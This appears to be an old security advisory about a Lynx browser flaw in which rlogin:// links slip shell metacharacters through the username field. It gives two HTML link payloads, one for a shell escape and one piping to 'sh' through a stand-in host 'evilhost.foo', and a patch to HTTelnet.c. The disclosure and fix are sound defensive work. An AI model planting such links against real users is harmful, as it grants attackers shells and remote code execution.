COMMAND

    lynx

SYSTEMS AFFECTED

    Systems running lynx

PROBLEM

    Artur Grabowski found following.   Lynx has a feature that  allows
    trojans.  For users  on systems where lynx  is the login shell  or
    somehow the  only program  allowed to  run, the  user can obtain a
    shell by simply "clicking" a link that looks like this:

        <a href="rlogin://foo;sh@foo">foo</a>.

    Running hostile code is also easy with this feature:

        <a href="rlogin://eviluser|sh@evilhost.foo">foo</a>.

    The  ogin shell (or something similiar) for  eviluser@evilhost.foo
    prints out a few commands to run on the victim.  The problem is in
    WWW/Library/Implementation/HTTelnet.c     in     the      function
    remote_session.  It  strips off "bad"  characters ('|', ';')  from
    everything except the username:

        /*
         *      Modified to allow for odd chars in a username only if exists.
         *      05-28-94 Lynx 2-3-1 Garrett Arch Blythe
         */

    That was a bad decision.

SOLUTION

    The  obvious  fix  is  to  be  more paranoid than "user friendly".
    (diff made to the OpenBSD cvs repository, so the line numbers  can
    be wrong):

    Index: HTTelnet.c
    ===================================================================
    RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
    retrieving revision 1.1.1.1
    diff -u -w -u -r1.1.1.1 HTTelnet.c
    --- HTTelnet.c  1998/03/11 17:47:47     1.1.1.1
    +++ HTTelnet.c  1998/11/16 17:01:35
    @@ -73,8 +73,7 @@
             *  *cp=0;  / * terminate at any ;,<,>,`,|,",' or space or return
             *  or tab to prevent security whole
             */
    -       for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0';
    -               cp++)   {
    +       for(cp = host; *cp != '\0'; cp++) {
                if(!isalnum(*cp) && *cp != '_' && *cp != '-' &&
                                    *cp != ':' && *cp != '.' && *cp != '@') {
                    *cp = '\0';